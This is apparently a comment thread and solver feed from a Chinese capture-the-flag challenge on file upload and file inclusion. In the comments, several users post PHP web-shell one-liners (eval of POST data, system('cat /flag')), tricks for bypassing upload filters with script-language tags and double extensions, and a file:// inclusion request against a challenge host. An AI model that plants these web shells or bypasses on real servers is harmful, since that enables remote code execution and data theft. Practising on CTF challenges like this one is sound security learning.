评分(5)
解题动态
雪子且飞机 攻破了该题 1天前
马博文 攻破了该题 1天前
igrazee 攻破了该题 1天前
qsy 攻破了该题 1天前
liang123456 攻破了该题 1天前
minz 攻破了该题 2天前
白菜白又白 攻破了该题 2天前
15016808949 攻破了该题 2天前
bhcxzhdsa 攻破了该题 2天前
鲲中霸王 攻破了该题 3天前
out不慢 攻破了该题 4天前
sunshb07 攻破了该题 4天前
zrc2682 攻破了该题 5天前
15248665739 攻破了该题 6天前
19834403913 攻破了该题 6天前
Blmn 攻破了该题 7天前
帅帅123 攻破了该题 8天前
ixin 攻破了该题 8天前
tutuyeye 攻破了该题 8天前
评论
caicai0728 1月前
举报
解题参考,超详细:https://blog.csdn.net/cai_huaer/article/details/153740286?spm=1001.2014.3001.5501
15105219317 1月前
举报
文件上传成功了,蚁剑也显示连接成功,为啥没数据返回啊
lin666 2月前
举报
文件包含 + 文件上传 (使用非主流的内容写法来绕过常规的内容头替换 <script language="php">system("ls");</script> )
2686213396 4月前
举报
http://117.72.52.127:18030/index.php?file=file:///flag,file伪协议说是
satuo 4月前
举报
<script language=php>echo 'a'; eval($_POST['pass']);</script>
zhuizhui 5月前
举报
<script language=php>system("cat /flag")</script> webshell.php;.png
leonleonleon 5月前
举报
1.'<'+'?'+'php' 和'>'会被过滤; 2.后缀名会被过滤; 3.用'<' script lanugage=php 后面自己闭合一下,最后文件包含上传获取flag
shingu 8月前
举报
file=/flag,怎么会这么简单?
volnu1l 10月前
举报
新建txt,保存jpg <script language=php>system("ls /flag&&cat /flag")</script> 访问?file=upload/.jpg
yanqiye 11月前
举报
用file=/flag取巧做法,真正做题名字肯定要变,预期做法:传一句话,发现php标签被删了,直接用<?= @eval($_POST[1]);就可以了。